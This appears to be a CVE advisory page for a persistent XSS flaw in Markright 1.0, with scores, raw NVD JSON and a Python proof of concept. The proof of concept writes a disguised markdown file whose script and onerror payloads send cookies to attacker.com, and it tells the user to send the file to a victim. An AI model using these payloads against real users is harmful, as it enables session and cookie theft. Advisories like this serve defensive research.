Security Vulnerability Report
CVE-2021-47838 CVSS 7.2 HIGH

Published: 2026-01-16 19:16:09
Last Modified: 2026-04-15 00:35:42

Description

Markright 1.0 contains a persistent cross-site scripting vulnerability that allows attackers to embed malicious payloads in markdown files. Attackers can upload specially crafted markdown files that execute arbitrary JavaScript when opened, potentially enabling remote code execution on the victim's system.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Markright < 1.0 (affected)
Markright = 1.0 (confirmed affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2021-47838 PoC - Markright Persistent XSS
# This PoC generates a malicious Markdown file with XSS payload

import os


def generate_malicious_markdown():
    """Generate malicious Markdown file with XSS payload"""
    # XSS payload - executes JavaScript when file is opened
    xss_payload = '<script>alert("XSS - CVE-2021-47838"); document.location="https://attacker.com/steal?cookie="+document.cookie;</script>'

    # Alternative payload using img onerror
    # (inner single quotes are escaped so the Python string literal is valid)
    alt_payload = '<img src=x onerror="fetch(\'https://attacker.com/log?c=\'+document.cookie)">'

    # Create malicious markdown content
    malicious_content = f'''# Normal Looking Document

This is a legitimate Markdown document.

{xss_payload}

## Section 2

More content here...

{alt_payload}

---

*End of document*
'''
    return malicious_content


def save_payload(filename="exploit.md"):
    """Save the malicious markdown file"""
    content = generate_malicious_markdown()
    with open(filename, 'w', encoding='utf-8') as f:
        f.write(content)
    print(f"[+] Malicious Markdown file created: {filename}")
    print(f"[+] File size: {len(content)} bytes")
    return filename


if __name__ == "__main__":
    print("=" * 50)
    print("CVE-2021-47838 - Markright XSS PoC Generator")
    print("=" * 50)
    filename = save_payload()
    print(f"\n[!] Send this file to victim and have them open it in Markright")
    print(f"[!] When opened, the XSS payload will execute JavaScript")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47838", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:09.380", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Markright 1.0 contains a persistent cross-site scripting vulnerability that allows attackers to embed malicious payloads in markdown files. Attackers can upload specially crafted markdown files that execute arbitrary JavaScript when opened, potentially enabling remote code execution on the victim's system."}, {"lang": "es", "value": "Markright 1.0 contiene una vulnerabilidad de cross-site scripting persistente que permite a los atacantes incrustar cargas útiles maliciosas en archivos markdown. Los atacantes pueden subir archivos markdown especialmente diseñados que ejecutan JavaScript arbitrario al abrirse, lo que podría permitir la ejecución remota de código en el sistema de la víctima."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": 
"NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/dvcrn/markright", "source": "[email protected]"}, {"url": "https://imgur.com/a/VOsgKbZ", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49834", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/markright-persistent-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/markright-persistent-cross-site-scripting", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}